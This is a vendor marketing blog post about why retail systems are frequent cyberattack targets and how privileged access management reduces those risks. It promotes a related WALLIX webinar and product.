Retail at Risk: Cybersecurity Challenges and Solutions

Whether a multinational giant like Amazon or a more regionalized company like Safeway, retail systems are ubiquitous around the world. But just as ubiquitous are cyberattacks – and many of those attacks are aimed directly at retail systems, with 64% of retailers reporting an attempted attack on a monthly basis.

There are a number of factors that make retail systems attractive targets for hackers. Fortunately, there are also effective safeguards against these attacks.

The State of Technology in Retail

Among the primary reasons why hackers frequently target retail systems is the mixed technology that comprises these systems. It’s common, for example, for a retail system to have a mix of both old and new technologies – old point-of-sale (POS) systems and cash registers on the front end, for example, with cloud-based systems powering eCommerce, logistics, and administrative systems on the back end.

In part, the mixed technological state of retail is driven by the industry’s desire to provide omnichannel touchpoints for consumers; that is, there is a keen need to provide convenience for the customer, whether that customer is in-store or online. Thus, retailers are slow to upgrade things like cash registers and POS systems both because the customer is familiar with them, but also because the store staff is familiar with them and can efficiently process a high in-store volume of customers. On the other side of that coin, though, retailers also recognize the need to provide consumers with online convenience, and thus have also implemented newer technologies like eCommerce into their operations. Combined, these old and new systems meet retailers’ goals of both efficiency and scalability – but they also present multiple potential attack vectors for hackers.

Retail Cyber (In)Security

Cyberattacks against the retail sector are an ongoing concern: Since Q1 of 2018 alone, successful attacks against major retailers including Best Buy, Macy’s, Sears, and Under Armour have all been reported. Such attacks are costly: The average cost of a hack to an eCommerce site is $4 million, with an average price tag per data set of $172. And these costs have risen 29% since 2013 – as Big Data keeps getting bigger, the costs associated with a successful attack are also likely to continue to grow.

Aside from the mixed technologies inherent to the retail industry, there are also several other reasons why retail is especially at risk of attack:

  • Customer data is frequently high-value because it contains things like credit card numbers, phone numbers, security questions and answers, and the like, and is thus sought after by hackers.
  • There is a traditionally high rate of staff turnover, which means that without proper management there is also a high rate of privileged account access to systems that shouldn’t – but does – exist.
  • The prevalence of eCommerce systems means that there is a publicly-accessible front end that is connected to critical systems in the background.
  • Each of the suppliers and contractors that need access to the system is potential attack vector.
  • Automated warehouse and logistics IoT solutions also provide a high number of potential entry points into a retail system.

Retail Security, Simplified

The risks outlined above all point, either directly or indirectly, to the need for robust privileged access management. Privileged access refers to the kinds of access to system resources that require elevated permissions, such as the ability to query database servers, for example, or even to see them in the network in the first place.

Privileged Access Management (PAM), in turn, is making sure that users without elevated permissions can’t access privileged resources – and that those users who do have privileged access only see the resources that are necessary and appropriate to them, and under circumstances (e.g., time and location) that are also appropriate.

Because so many of the cybersecurity risks inherent to retail are related to privileged access, then, a robust PAM solution that spans the entire system makes it vastly more secure than it otherwise would be, and simplifies that security in the process. It does so by only granting privileges that are appropriate – but it also revokes those privileges when they are no longer appropriate. Here’s how a PAM solution should handle each of the risks discussed above:

  • Attacks through a public access point such as an eCommerce login are stopped before they can do systemic damage or spread because the PAM system never grants such users privileged access to any part of the system.
  • Outdated user accounts are discoverable and any privileged credentials easily (or automatically) revoked, which keeps hackers from successful attacks via outdated staff accounts.
  • Third parties like suppliers and contractors can only see systems that are relevant to them, and can’t “bounce” to unrelated systems. For example, a supplier may be granted privileged access to a certain logistics functionality, but will not even be aware of other system components, much less have access to them. Or a contractor may be granted privileged access to work on a server, but only at a given time and for a given duration. In both situations, even were a hacker to comprise a third-party login they would still not be able to cause widespread damage because the PAM solution would prevent any further access.
  • A robust PAM solution also secures machine-to-machine (M2M) components within a system. Thus even if a hacker somehow gains control of an IoT device in an automated warehouse, for example, the PAM solution hasn’t granted privileged access to that device – and thus the hacker cannot use it as a platform from which to further their exploits.

To secure the system even further, a full-featured PAM solution should be capable of real-time monitoring of all privileged session activity, and also of either automatically terminating suspicious sessions or else alerting an admin (or both).

Retail Regulatory Compliance, Simplified

The retail industry is subject to a wide variety of regulations with which companies must be in compliance – PCI DSS, GDPR, NIST, and SOX, to name just a few. And along with the session monitoring capabilities, if the PAM solution also records and makes it searchable every session, there’s always an audit trail to aid in compliance with all of those regulations. Furthermore, the recorded sessions are also useful for security reviews, as well as for the training of security team members.

Risky Business: Cybersecurity in Retail Webinar

Cybersecurity in the retail industry is complicated – but a solution involving privileged access management needn’t be. For more insights on the topic, be sure and watch the webinar from which the above was drawn, Risky Business: Cybersecurity in Retail, presented by WALLIX cybersecurity expert Grant Burst. Grant discusses all of the above topics, provides his own insights based on years in the cybersecurity industry, and then tells the (true!) story of how one leading sporting goods retailer used the WALLIX Bastion to dramatically improve their cybersecurity.